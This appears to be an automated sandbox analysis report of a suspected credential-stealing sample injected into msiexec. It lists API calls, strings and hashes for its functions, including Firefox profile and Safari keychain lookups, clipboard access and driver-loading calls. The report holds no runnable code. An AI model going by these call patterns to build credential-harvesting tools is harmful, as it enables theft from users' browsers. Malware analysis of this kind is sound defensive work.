                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                              • GetLastError.KERNEL32 ref: 00409974
                                                              • CloseClipboard.USER32 ref: 0040997D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 3604893535-0
                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00409882
                                                              • wcslen.MSVCRT ref: 0040988F
                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                              • CloseClipboard.USER32 ref: 004098D7
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1213725291-0
                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • free.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 2360000266-2664311388
                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                              APIs
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              • OpenClipboard.USER32(?), ref: 00411878
                                                              • GetLastError.KERNEL32 ref: 0041188D
                                                                • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                              • String ID:
                                                              • API String ID: 2628231878-0
                                                              • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                              • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                              • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                              • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                              • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                              • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 577499730-1134094380
                                                              • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                              • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                              • String ID: :stringdata$ftp://$http://$https://
                                                              • API String ID: 2787044678-1921111777
                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              • {Unknown}, xrefs: 004132A6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 3143752011-1996832678
                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
